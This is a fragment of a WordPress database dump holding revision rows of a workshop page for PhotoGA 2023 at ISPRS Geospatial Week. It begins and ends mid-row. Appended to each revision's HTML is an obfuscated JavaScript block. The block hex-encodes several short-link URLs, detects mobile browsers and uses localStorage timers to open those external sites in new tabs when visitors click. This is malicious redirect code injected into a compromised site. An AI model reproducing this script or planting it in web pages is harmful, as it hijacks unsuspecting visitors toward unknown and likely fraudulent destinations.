70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 14:00:25','2022-12-16 14:00:25','',3449,'https://gsw2023.com/?p=3470',0,'revision','',0),
(3471,1,'2022-12-16 14:01:31','2022-12-16 14:01:31','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"63\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 14:01:31','2022-12-16 14:01:31','',3449,'https://gsw2023.com/?p=3471',0,'revision','',0),
(3472,1,'2022-12-16 14:02:03','2022-12-16 14:02:03','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"63\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return 